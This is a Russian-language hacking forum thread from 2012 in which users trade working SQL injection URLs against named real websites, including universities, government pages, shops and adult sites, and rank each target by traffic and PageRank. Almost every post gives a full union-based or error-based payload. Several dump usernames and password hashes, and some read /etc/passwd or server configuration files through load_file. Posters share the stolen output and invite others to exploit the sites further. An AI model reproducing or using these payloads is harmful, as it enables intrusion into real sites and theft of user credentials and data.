http://www.fckhimki.ru/modules/news/index.php?current_id=1&news_id=-2896+union+select+1,2,3,4,5,6,7,8,9,version(),11,1 2,13,group_concat(schema_name)+from+information_sc hema.schemata+--+
t3cHn0iD
08.06.2012, 13:10
Для любителей пинболла.
http://www.ozpinball.com/classified.php?id=-346+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,115,16,17,18,19,20,21,22,23,24,25,26,27,28 +--+
Музыкальный каталог.Скуля выявлена по ошибке:DataBase Error!!!
http://blog4rock.com/album.php?id=-104404+union%0Aselect+1,version(),3,4,5,6,7+--+
В качестве ошибки выводится запятая (,)
http://www.sheltoweeart.com/member-detail.php?ID=-52+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16+--+
Выводится в ошибке
http://www.freezinforareason.com/members/member.php?mem_id=-746+union+select+1,concat_ws(0x3a,email,password), 3,4+from+members+--+
Га-Ноцри
08.06.2012, 16:17
ТИЦ == 10, PR == 6; AR == 132,924
PHP:
http://www.africa.com/print?type=city&url=-777777777'+union+select+1,database(),3,4,5,6,7,8,9--+h
t3cHn0iD
08.06.2012, 16:36
Code:
http://www.soa.ca/member_details.php?id=-60'+/*!UNiON*/+/*!SELECt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,version(),49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63+--+
http://www.berettaspeed.com/members/view.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35+--+
http://www.cwilmington.com/member_detail.php?id=-226+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,concat_ws(0x3a,username,password),18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39+from+cw_member+--+
http://www.gardendesigngroup.ca/member_display.php?id=-8+union+select+1,version(),3,4,5,6,7,8,9,10,11+--+
http://www.helmetgames.com/memberPanel.php?ID=-98+/*!UNiON*/+/*!SELECt*/+version(),2,3,4,5,6,7,8,9,10,11,12+--+
Га-Ноцри
08.06.2012, 20:33
Create a Countdown Clock Widget for Your Website.
PR == 4;
PHP:
http://countingdownto.com/countdown/ololo+and+(select+1+from(select+count(*),concat(da tabase(),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)--
Sidarovich1975
09.06.2012, 01:18
ядро:
ТИЦ 475!
http://web.yadro.ru/vbnstat.php3?vbnum=-3+union+select+1,concat_ws(0x3a,nick,passwd),3,4,5 ,6,7,8,9,10,11,12+from+account+--+
банерхост:
ТИЦ 50
http://members.bannerhost.ru/info/vbnstat.php3?vbn=-23+union+select+1,concat_ws(0x3a,nick,passwd),3,4, 5,6,7,8,9,10,11,12,13,14+from+account+--+
t3cHn0iD
09.06.2012, 09:33
Code:
http://www.northalsted.com/pages/member/47.php?id=-409'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 +--+
http://www.steelexpo.ru/print_base.php?id=-6801+union+select+version(),2,3,4+--+
http://www.baseworld.com/stores.php?id=-1'+/*!UNiON*/+/*!SELECt*/+1,version(),3,4,5,6,7,8,9,10+--+
http://hardware.org.ru/faq/answ.php?id=-9493'+union+select+1,2,3,version(),5,6,7,8,9,10+--+
http://www.ramadaplazadoha.com/food_drink/logodetails.php?id=-18+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,u ser_pass),7,8+from+admin_user+--+
http://www.foodandvine.com/news_article.php&id=-18+union+select+1,concat_ws(0x3a,userid,passwd),3, 4,5,6,7,8+from+Users--+
http://goodfoodla.org/calendar_readmore.php?id=-13+union+select+1,2,3,4,version(),6,7,8,9,10+--+
http://www.boyersfood.com/party-trays.php?ID=-8э+union+select+version(),2,3,4,5+--+
Ресторан "Потаскуй" :D
http://potaskuy.com/01_Food/00_Food.php?k=-3+union+select+1,2,concat_ws(0x3a,login,passwd),4, 5,6,7+from+site_login+--+
http://potaskuy.com/01_Food/00_Food.php?k=-3+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7+from+sf_guard_user+--+
http://www.infokontakt.ru/subdomains/pumps/food/pumps.php?id=-15+union+select+version(),2,3+--+
http://www.foodaktuell.ch/editorial.php?id=-177+union+select+1,2,titel,4,5,6,7+from+dbinfo+--+
Тиц: 700
PR: 7
Code:
http://diglib.lib.utk.edu/rfj/index.php?bid=1&pg=4-999999.9+union+select+version(),2--+g
Смотрим исходник:
Code:
--------------------------------
Тиц: 275
PR: 7
Code:
http://m.ua.edu/d/map/bid_list.php?bID=1'+union+select+1,2,@@version--+f
Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
--------------------------------
Тиц: 950
PR: 9
Code:
http://marine.rutgers.edu/cool/auvs/index.php?did=163-999999.9')union+select+1,2,3,4,version(),6,7,8,9,1 0,11,12--+f&view=kmz
5.1.52
P.S. Это другие поддомены.
Ппц, на оформление ушло больше вреемени чем на раскрутку
Тиц: 1200
PR: 8
Code:
http://lifescience.arizona.edu/programs.php?pid=-1+union+select+1,2,3,4,concat_ws(0x3a,netid,passwo rd),6+from+lifesci_ref.user+limit+3,1--+f&pa=Animal+Sciences
admin.php
Га-Ноцри
09.06.2012, 19:53
Тоже поддержу edu-тематикой
ТИЦ == 20, PR == 6, DMOZ == true;
PHP:
http://www.gcu.edu/faculty-bio.php?fid=-777777777777'+union+select+1,2,concat_ws(0x03a,dat abase(),user(),version()),4,5,6,7,8,9,10,11,12--+h
Code:
http://amanday.org.ua/bands/detail.php?id=0+union+select+1,2,3,concat_ws(0x3a, login,password),5,6,7+from+user_data--+
http://list.nsklife.ru/?q=catalog&cat=3'and+1=2+union+select+1,version(),3--+
winstrool
11.06.2012, 12:31
Информационный портал Всероссийской олимпиады школьников
PR:5 ТИЦ:325 ALEXA:402071
http://rosolymp.ru//index.php?option=com_myblog&category=acab'+union+select+/*!concat((select(@x)from(select(@x:=0x00),(select( 0)from(information_schema.columns)where(table_sche ma!=0x696e666f726d6174696f6e5f736368656d61)and(0x0 0)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,ta ble_name,0x3a,column_name))))x))*/++--+'
PR=4
http://albtrainfirms.com/start.php?idf=10/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,database%28%29,8,9,10,11,12,13
PR=5
http://www.zpug.net/community/news_view.php?id=23&page_id=108+and+1=0+union+select+version%28%29,2,3 ,4,5,6,7,8
Га-Ноцри
11.06.2012, 20:52
Почти как наш отечественный фриланс, лол.
PHP:
http://free-lance.us/index.php?CatId=1+and+(select+1+from(select+count( *),concat(database(),floor(rand(0)*2))x+from+infor mation_schema.tables+group+by+x)a)
Sidarovich1975
11.06.2012, 21:53
inj:
http://www.islamichistorymonth.com/articles/article.php?id=-3268+union+select+1,2,3,4,5,6,7,concat_ws(user(),v ersion(),database()),9,10,11,12,13,14+--+
user-version-data:
5.0.67
root@localhost
ihm_db
load_file:
http://www.islamichistorymonth.com/articles/article.php?id=-3268+union+select+1,2,3,4,5,6,7,load_file(0x2f6574 632f706173737764),9,10,11,12,13,14+--+
premiumseeds.ru
PHP:
http://premiumseeds.ru/?show=s_cat&id=181+or+1+group+by+concat%28%28select+version%28 %29%29,0x00,floor%28rand%280%29*2%29%29having+min% 280%29+or+1--+
5.1.47-log
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 0
------------------------------------------------------------------------------------
priceinkerala.com
PHP:
http://www.priceinkerala.com/compa.php?id=-235+union+select+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46--+
5.0.95-community
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 1
-----------------------------------------------------------------------------------
pakwatan.com
PHP:
http://www.pakwatan.com/pakwaan_detail.php?id=50+or+1+group+by+concat((sel ect+user+from+mysql.user()),0x00,floor(rand(0)*2)) having+min(0)+or+1--+
5.1.61-community-log
Яндекс тИЦ (CY) 0
Alexa Rank 323,035 -482,975
Google PageRank (PR) 4
-----------------------------------------------------------------------------------
pizzifarm.com
PHP:
http://www.pizzifarm.com/index.php?id=5+or+1+group+by+concat((select+versio n()),0x00,floor(rand(0)*2))having+min(0)+or+1--+
4.1.20
Яндекс тИЦ (CY) 0
Alexa Rank 8,502,816 +1,801,629
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
npwrinc.com
PHP:
http://www.inpwrinc.com/prcomp.php?id=5'+or+1+group+by+concat((select+user +from+mysql.user),0x00,floor(rand(0)*2))having+min (0)+or+1--+
5.1.31
Яндекс тИЦ (CY) 0
Alexa Rank 23,048,448
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
Га-Ноцри
11.06.2012, 23:52
PR == 4;
PHP:
http://www1.plurib.us/?year=-2006+union+select+1,2,concat_ws(0x03a,id,username, password,usertype),4,5,6,7,8,9,10+from+plurib_joom la_prod.jos_users--
kingbeef
12.06.2012, 00:37
Гарвард
Тиц 3000
PR 8
13 800 000 страниц в Гугле
http://mazur.har[google]vard.
edu
/research/detailspage.php?rowid=8'+order+by+23--+f
PostgreSQL не могу дальше раскрутить.
Code:
http://www.strategicvision.com/press_release.php?pr=39+and+2=1+/*!union*/+/*!select*/+1,concat_ws%280x3a,user%28%29,version%28%29,datab ase%28%29%29,3,4,5,6,7,8--
Username: strategi_web@localhost
Version: 5.0.77
Database: strategi_website
Google PR: 4
Code:
http://infomedfarmdialog[dot]ru/?module=video_archive&event_id=1+and+0+union+all+select+(select(@x)from( select(@x:=0x00),(select(0)from(information_schema .columns)where(table_schema=0x7777776c6f6d62617264 30317275)and(0x00)in(@x:=concat(@x,0x3c62723e,tabl e_schema,0x2e,table_name,0x3a,column_name))))x)--+
User: lombard0@fe56.hc.ru
Database: wwwlombard01ru
Version: 5.1.58-log
PR - 4
CY - 140
Га-Ноцри
12.06.2012, 21:26
ТИЦ == 10, PR == 4, AR ==11,040, трафф.
Число зарегистрированных пользователей сайта == 50674
PHP:
http://officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6 ,7,8+from+users--+h
Число зарегистрированных пользователей форума == 48040
PHP:
http://officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6 ,7,8+from+_vb_user--+h
Grifon said:
обнаружил инъекцию по адресу http://www.azalsigorta.com/?mod=pages' но при попытке внедрения кода срабатывают фильтры как можно их обойти?
Крутая ситуация) У тебя скулья с LFI. Инклюдится пятая колонка:
Code:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,3,4,0x2e2e2f2e2e2f2e2e2f2 e2e2f2e2e2f6574632f706173737764)--+f
Результат:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
....
Где 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f7061737377 64 это ../../../../../etc/passwd.
UPD.
Code:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,version(),4,0x2e2e2f2e2e2 f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
В самом низу
Code:
Fatal error: Class '5.5.23-55' not found in /home/azalsigo/public_html/library/core/Core.class.php on line 19
Удачи!
Га-Ноцри
13.06.2012, 20:53
PR == 4;
PHP:
http://www.c-registry.us/pages/index.php?pID=77777777'+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3--+h
PR == 3;
PHP:
http://www.deals365.us/category.php?catid=-174+union+select+1,version(),3,4--
тИЦ == 10
PR == 1
PHP:
http://ventura.rudtp.ru/articles.php?id=4+union+sele.ct+1,2,3,GROUP_CONCAT (table_name,0x0a)+from+information_schema. tabl es+--
PHP:
http://www.ubytok.ru/faq?cat_id=1 and 0 union all select 1,2,3,4, 5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0 )from(information_schema.columns)where(table_schem a=0x617a62756b61737a5f756279746f6b)and(0x00)in(@x: =concat(@x,0x3c62723e,table_schema,0x2e,table_name ,0x3a,column_name))))x),0--
User: azbukasz_ubytok@localhost
Database: azbukasz_ubytok
Version: 5.1.58
PR - 2
CY - 30
PHP:
http://www.crisis.ru/links.php?catid=1'+or+1+group+by+mid(version(),ran d(0)|0,64)+having+avg(0)--+
User: bankrot@localhost
Database: bankrot
Version: 5.0.95
PR - 4
CY - 50
http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+from(select+count(*),c oncat(version(),floor(rand(0)|0))x+from+informatio n_schema.tables+group+by+2)a+where(1=1)
http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+from(select+count(*),c oncat((select+concat_ws(0x3a,username,user_passwor d)from+phpbb_users+limit+1,1),floor(rand(0)|0))x+f rom+information_schema.tables+group+by+2)a+where(1 =1)
Login:md5 —> расшифровываем
Админка: /admin/
Делаем ретрив бд
Получаем бекдор в профиле
PR: 5
Pages: 4 430 000
CY: 425
Pages: 379 000
DMOZ: Y
Траф: 54 000
украинский датинг, жаль народа мало:
http://www.interduet.com/indexcont.php?ptravel=1%27+and+1=2+UnIon+selECt+1, 2,3,4,5,count%28*%29,version%28%29,8+from+user/*
HTML:
http://sport-lights.ru/dir.php?id=-2+union+select+1,2,3,4,5,6,7,group_concat(schema_n ame+separator+0x3C62723E),9,10,11+from+information _schema.schemata--
Bases:
information_schema
allrecords
autonews
avtobang
avtobudget
avtoclubber
avtogramma
avtokarton
basket-team
basketblog
biatlonblog
bombnews
club
dating
doyouknow
engfootball
engfutbolist
epigraf
flagi
flashgames
footballblog
francefoot
francefootball
gerfoot
gerfootball
incognita
ingectors
italfoot
italyfootball
kinofreaks
kinopazl
kzu
lyrics
memorygame
netnewsmaker
nobel
poller
relaxat
rossfoot
rusfootball
spainfoot
spainfootball
sportemblem
sportnews
trenerchgk
turkfootball
twichange
ukrfoot
ukrfootball
viktorina
Мне не интересны..
etuners.gr/en/index.php?s=13&t=296+UNION+SELECT+1,2,3,concat(user(),version()), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+limit+1 ,1--
nzho.ru/catalog.php?id=137+union+select+1,concat(user(),ve rsion()),3,4,5+limit+1,1--
wellydiecast.com/product_list.php?id=1+UNION+SELECT+concat(user(),v ersion())+LIMIT+1,1--
operalane.com/shop.php?item_id=15+union+select+1,(user(),version ()),3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1--
www.skyproairsoft.com/news_detail.php?id=5+UNION+SELECT+concat%28user%28 %29,version%28%29%29,2,3,4+LIMIT+1,1--
Pirotexnik
18.06.2012, 20:19
http://www.meteonova.ru/search/index.htm?req=liststates&stfrom=1101&stto=-1110+UNION+select+1,cast(concat_ws(0x3a,user,host, password)+as+binary),3,4,5+from+mysql.user+--+
root@localhost
ТИЦ 700
PR 5
трафф - 10к
ТЕЛЕФОННЫЙ СПРАВОЧНИК
МИНИСТЕРСТВА СОЦИАЛЬНОЙ ЗАЩИТЫ НАСЕЛЕНИЯ АМУРСКОЙ ОБЛАСТИ
Code:
http://help.amurobl.ru/tel/index.php?id=1+and+1=0+union+select+1,2,group_conc at(column_name+separator+0x3a),4,5,6,7,8,9,10,1,12 ,13+from+information_schema.columns+where+table_na me=0x7573657273--+
5.1.56 / ter@94.25.80.237
Code:
Database: mszn
SofiaLoar
21.06.2012, 20:18
PHP:
http://www.toydorks.com/displayproduct.php?item=-1+union+select+1,2,3,group_concat(table_name+separ ator+0x3C62723E),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+information_schema.tables
PR: 4
канада,игрушки
PHP:
http://www.hitchedmag.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(table_ name,0x3a,column_name+separator+0x3C62723E),10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+f rom+information_schema.columns+--+
PR:3
Code:
http://www.readingmatters.co.uk/book2.php?id=1111111111111111+union+select+1,2,3,4 ,5,6,7,group_concat(table_name,0x3a,column_name+se parator+0x3C62723E),9+from+information_schema.colu mns+--+
CY:10 PR:5
имеется таблица wp_users в базе readingmatters-wp,но я туда не смог добраться почему-то
Code:
http://www.hondashowoff.com/profile.php?id=-1+union+select+user_password+from+users+--+
Blind sql
CY:10 PR:3
Code:
http://www.greenenaftaligallery.com/artist.php?id=-1+union+select+1,version(),user(),4,5,6,7+--+
PR:5
Code:
http://www.benayoun.com/projet.php?id=-1+union+select+version()/*+
PR:5
nemaniak
22.06.2012, 17:13
jazzcorner.com PR-6
Code:
www.jazzcorner.com/news/display.php?news=-2060+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16+--+
Code:
5.0.95-community:jazzcorn_jcadmin@drums.jazzcorner.com:ja zzcorn_main
leavenworth.org PR-5
Code:
www.leavenworth.org/modules/event/events.php?pageid=26'+and(select+1+from(select+cou nt(*),concat((select+concat_ws(0x3a,version(),user (),database())),floor(rand(0)*2))x+from+informatio n_schema.tables+group+by+x)a)+and+'QceT'='QceT--&path=26&print=true
Code:
5.0.45:LCC_ChamberR@localhost:lcc1
localcrimenews.com PR-5
Code:
www.localcrimenews.com/lookup.php?uid=99999&jid=-6975733+UnIon+selECt+1,2,concat_ws(0x3a,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+--+&refid=1950&cname=Gilroy
Code:
5.1.63-cll:theur_cacrime@localhost:theur_cacrime
winstrool
23.06.2012, 08:25
office@10.0.0.1:5.0.51a-log:antique
http://www.artantique.ru/article-item.phtml?id='-11'+union+select+concat_ws(0x3a,user(),version(),d atabase())+--+
u329879_bitmafua@10.9.11.99:5.5.15-log:u329879_bitmafua
http://www.bit-mfua.ru/voting/3/
POST:action=addvoice&answer=11' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,user(),version(),database())),1,63) , FLOOR(RAND(0)*2)))#
rbc@localhost:5.1.29-rc-log:rbc
http://wap.rbc.ru/content/item.phtml?secid=163&flid=-7333035+union+select+1,(select(@x)from(select(@x:= 0x00),(select(0)from(information_schema.columns)wh ere(table_schema!=0x696e666f726d6174696f6e5f736368 656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_ schema,0x2e,table_name,0x3a,column_name))))x),3+--+&itid=63028'c&page=&s=b81f0dca&pid=54886&oid=279&mode=tr
HellFire
23.06.2012, 10:04
Возобновляемые источники энергии и энергоэффективность.
Code:
http://www.reeep.org/index.php?id=9353&text=&special=viewitem&cid=1-1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Ve rsion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0 x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23--
Database Version: 5.0.22-Debian_0ubuntu6.06.5-log
Database name: conx26_reeep
User name: reeep@web2.reegle.info
ТИЦ: 10
PR: 6
Говнобложек.
Code:
http://www.getoutthere.info/blog.php?id=1-1+UNION+SELECT+1,2,3,4,CONCAT(Version(),0x2F2A2A2F ,Database(),0x2F2A2A2F,User()),6,7,8,9,10,11,12,13 ,14--
Database Version: 5.0.86
Database name: getoutthere
User name: posactivities@localhost
ТИЦ: 0
PR: 3
Кофейный магазин.
Code:
http://www.freshcup.com/featured-article.php?id=1-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT( Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()) ,0x71),0x71),4,5,6,7--
Database Version: 5.0.77-log
Database name: 417980_freshcup
User name: 417980_freshcup@172.17.66.136
ТИЦ: 10
PR: 5
Магазин виниловых-наклеек.
Code:
http://www.33dodo.ru/goods.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0 x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71 ),36,37--
Database Version: 5.0.92-log
Database name: dodo6909_33dodoru
User name: dodo6909_33dodor@localhost
ТИЦ: 60
PR: 3
Профессиональное звуковое и световое оборудование.
Code:
http://www.sstrade.ru/goods.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT (CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User()),0x71),0x71)--
Database Version: 4.1.25
Database name: test
User name: root@localhost
ТИЦ: 20
PR: 2
Генетика и магазин реагентов.
Code:
http://imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User()),3,4,5,6,7--
Database Version: 5.0.77
Database name: ssingh_plpdb
User name: root@localhost
ТИЦ: 20
PR: 5
http://www.esoterica.ru/catalog.php?c=1&b=-22%20and%201=2%20union%20select%20aes_decrypt(aes_ encrypt(concat_ws(0x3a,@@version,user(),database() ),0x71),0x71)+--
4.1.13a-nt-max-log gb_esoterica@10.0.1.20 gb_esoterica
Skofield
23.06.2012, 20:22
Code:
http://sites.upc.edu/aaupc/index.php?option=com_content&task=view&id=474&idpag=301&Itemid=157&ID=3344+or+(@:=1)||@+group+by+concat((select+subst r(concat_ws(0x3a,user,pwd),1,100)+from+users+limit +0,1),@:=@-1)having+@||min(@:=0)--+
Database Version: 5.0.32-Dotdeb_1.dotdeb.1-log
Database name: aaupc
User name: admaaupc@morguapu.upc.es
Code:
http://sites.upc.edu/~w-unesco/angles/noticia.php?id=-62+union+select+1,2,3,group_concat(table_name),5,6 ,7,8,9,0,11,12,13,14+from+information_schema.table s--
Database name: w-unesco
User name: w-unesco@localhost
SITE: top.ryazan.ru
DB: bukan192_toprzn
MySQL version: 5.1.63
MySQL user: bukan192_btoprzn
Скрин сайта:
http://i047.radikal.ru/1206/a5/5648bb2c7d1d.png
Информация о сайте:
тИЦ: 90
Google PageRank: 3
Users: >4000
IP сайта: 92.63.107.233
Страниц в Google: 6090
Веб-сервер: nginx (1.2.1)
Хостинг сайта: webdc.ru
__________________________________________________ __________
Инъекция:
http://top.ryazan.ru/top.php?cat=-3+union+select+1,2,3,4,
5
,
6
,7,8,9,10,11,
12
,13,
14
,15,16,17,18,19,20,21+--+
Вывод на страницу: 5,6,12,14
PHP:
http://www.tesar[dot]ru/faq/?func=show_answer&f_id=1-1+union+all+select+1,concat_ws(0x3a,user(),databas e(),version()),3--+
User: tesar@localhost
Database: tesar
Version: 5.0.92
PR - 3
CY - 170
PHP:
http://www.edimax[dot]ru/ru/events_detail.php?e_id=1-1+union+all+select+1,2,3,4,user(),file_priv,7,8+fr om+mysql.user+where+user=0x726f6f74--+
User: root@zvm30.host.ru
Database: edimaxc_ua
Version: 5.0.96
File_priv: Y
PR - 5
CY - 160
Sidarovich1975
25.06.2012, 17:50
EDU, pr-4 :
PHP:
http://student.bard.edu/clubs/templates/template2.php?id=-1201'+union+select+concat_ws(CHAR(32,58,32),user() ,version(),database())+--+
Результат в сорцах:
stuwww@student01.bard.edu : 5.0.77-log : tools_new
Га-Ноцри
25.06.2012, 19:23
ТИЦ == 10, PR == 4;
PHP:
http://www.kenston.k12.oh.us/khs/kenston.high.school.photo.gallery.php?id=1041'+and +(select+1+from(select+count(*),concat(database(), floor(rand(0)*2))x+from+information_schema.tables+ group+by+x)a)--+h
lizaalert.org/article.asp?sf=4&sfp=13&id=4++UNION+SELECT+1,2,3,4,5,6,concat(user(),versi on(),database()),8,9,10,11,12,13,14+LIMIT+1,1--
jourroot@70.38.11.1855.1.45-communitysitecont
soft-ufa.ru/?type=page&method=show&id=4++UNION+SELECT+1,concat(user(),version(),datab ase()),3+limit+1,1--
mnetcat_soft@localhost5.0.26-logmnetcat_soft
HellFire
28.06.2012, 00:28
Cайт посвящённый косплею.
Code:
http://www.cosplace.net/coscraft.php?id=1488-666+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User()),4,5,6,7,8--
Database Version: 5.0.67-percona-highperf-b7-log
Database name: cosplace
User name: cosplace@localhost
ТИЦ: 10
PR: 2
Институт вычислительных технологий СО РАН.
Вывод результата в названии файла.
Т.к. кол-во символов в названии файла режется - пишу по частям:
Code:
http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,CONCAT(Version())--
Code:
http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,CONCAT(Database())--
Code:
http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,CONCAT(User())--
Database Version: 4.0.17
Database name: jct
User name: jct@www.ict.nsc.ru
ТИЦ: 1800
PR: 6
Га-Ноцри
28.06.2012, 18:31
TИЦ == 10, PR == 2;
PHP:
http://www.victoriya-security.ru/eng/consultation.php?id=-28'+union+select+1,group_concat(table_name),3,4,5, 6,7,8,9+from+information_schema.tables--+h
TИЦ == 10, PR == 2;
PHP:
http://abkteh.ru/videonabludenie/?vid=-10+union+select+1,2,concat_ws(0x03a,login,password ,status),4,5,6,7,8,9+from+users+limit+1,1--
BEEG.COM - порнушный трафик-холдер
Яндекс тИЦ: 10
Google Page Rank: 4
Доля интеренет трафа: 0.2% - 5-12 миллионов посетителей в день
Выжал за 3 месяца на полную, но скуля осталась. Забирайте.
Error Based XPATH SQLi
http://beeg.com/?id=-1'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING( group_concat(remoteaddr),1,31))from(workers_info)) )))And(1)='1
Уязвимое поле: GET
5.5.21-log
tube_01
/usr/local/share/mysql/
www.plugrush.com - еще один порнушный трафик-холдер
Google Page Rank: 2
Доля интернет: 0.03% - 1-2 миллиона посетителей в день (возможно намного больше)
Не добился успеха. Сложная соль, неизвестна админка.
Error Based Duplicate entry SQLi
1'and(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/mid(group_concat(table_name),1,64)/**/from/**/information_schema.tables),1,64),floor(rand(0)*2)) )='1
Уязвимое поле: REFERER
5.0.77-log
plugleap2
plugleap2@69.55.52.209
viesearch.com - поисковик
Яндекс тИЦ: 10
Google Page Rank: 4
Доля интеренет: 0.015%
Мало трафа, бросил.
Error Based Duplicate column SQLi
http://viesearch.com/',(select*from/**/(select(name_const(version(),1)),name_const(versio n(),1))a),'
Уязвимое поле: GET
5.0.95-community
Lam3rsha
29.06.2012, 03:46
http://www.delreyhotel.com/dining.php?ids=6+UNION+SELECT+CONCAT(0x7873716C696 E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F 2A2A2F,User(),0x7873716C696E6A656E64),2
Database Version: 5.0.95-community
Database name: delrey_delreybd
User name: delrey_delrey@localhost
kingbeef
29.06.2012, 14:41
Lam3rsha said:
http://www.delreyhotel.com/dining.php?ids=6+UNION+SELECT+CONCAT(0x7873716C696 E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F 2A2A2F,User(),0x7873716C696E6A656E64),2
Database Version: 5.0.95-community
Database name: delrey_delreybd
User name: delrey_delrey@localhost
Xsqlinjbegin5.0.95-community/**/delrey_delreybd/**/delrey_delrey@localhostxsqlinjend
Что за бред?
Не легче 0x3a или 0x3c62723e ?
Sidarovich1975
29.06.2012, 16:03
EDU в магадан
EDU с базой, в т.ч. е-маил..., ничего не фильтруется, mysql-user - root!! советую поковыряться во всех базах... их там много...
user:database:version
PHP:
http://digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er(),database(),version()),11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+f rom+user+--+
root@localhost
cs:5.0.67-0ubuntu6.1
name,password
PHP:
http://digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,UID,Passwd,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34+from+user+--+
кавычки не фильтруются, File_priv=Y =>
load_file
PHP:
http://digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,load_file('/etc/passwd'),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34+from+user+--+
Га-Ноцри
01.07.2012, 03:01
ТИЦ == 10, PR == 5, DMOZ == true(Monterey » Business and Economy);
PHP:
http://www.backscatter.com/learn/article/article.php?ID=57+and+(select+1+from(select+count( *),concat(database(),floor(rand(0)*2))x+from+infor mation_schema.tables+group+by+x)a)--
ТИЦ == 10, PR == 6;
PHP:
http://www.gqrr.com/index.php?ID=-408+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex( hex(version())),14--
HellFire
01.07.2012, 14:05
Кадровый клуб Санкт-Петербурга.
Code:
http://www.kkspb.ru/index.php?id_category=1+UNION+SELECT+1,2,3,CONCAT( Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()) ,5,6,7,8,9,10--
Database Version: 4.1.22-lk-log
Database name: kkspbru
User name: kkspbru@localhost
